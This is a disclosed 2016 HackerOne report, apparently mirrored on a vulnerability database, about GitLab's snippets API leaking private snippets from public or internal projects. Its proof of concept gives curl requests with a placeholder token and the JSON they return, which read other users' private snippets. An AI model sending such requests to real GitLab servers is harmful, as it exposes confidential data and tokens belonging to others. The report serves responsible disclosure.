Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneJobertH1:134305
HistoryApr 25, 2016 - 1:34 a.m.

GitLab: Private snippets in public / internal projects leaked though GitLab API

2016-04-2501:34:19
jobert
hackerone.com
16
JSON

Vulnerability details

The /projects/:id/snippets resource leaks private snippets that were posted in a public or internal project.

Proof of concept

As a victim, create a new public or internal project. Lets state that the project has ID 1. Enable the snippets feature in the project settings and create a private snippet for the project. As an attacker, fetch all the snippets for the project:

curl --header "PRIVATE-TOKEN: XXXXXXXXXXXXXX" "http://gitlab-instance/api/v3/projects/1/snippets"

The response will contain snippet titles that were marked as private:

[
  {
    "id":6,
    "title":"Secret snippet",
    "file_name":"",
    "author":{
      "name":"Jane Doe",
      "username":"jane",
      "id":3,
      "state":"active",
      "avatar_url":"http://www.gravatar.com/avatar/f4d2ae4a63880c2a1c796bdd6d06a2d8?s=80\u0026d=identicon",
      "web_url":"http://gitlab-ubuntu-2gb-sfo1-01/u/jane"
    },
    "updated_at":"2016-04-25T01:06:05.554Z",
    "created_at":"2016-04-25T01:06:05.554Z",
    "expires_at":null
  }
]

The contents of a private snippet can be read by sending the following request to the GitLab API:

curl --header "PRIVATE-TOKEN: XXXXXXXXXXXXXX" "http://gitlab-instance/api/v3/projects/1/snippets/6/raw"

The response of this request leaks the contents of the snippet:

These are the contents of a private snippet.

Impact

It seems that private snippets may be used to hold private (API) tokens or similar confidential information. This can seriously damage to a company depending on what kind of information is shared.

JSON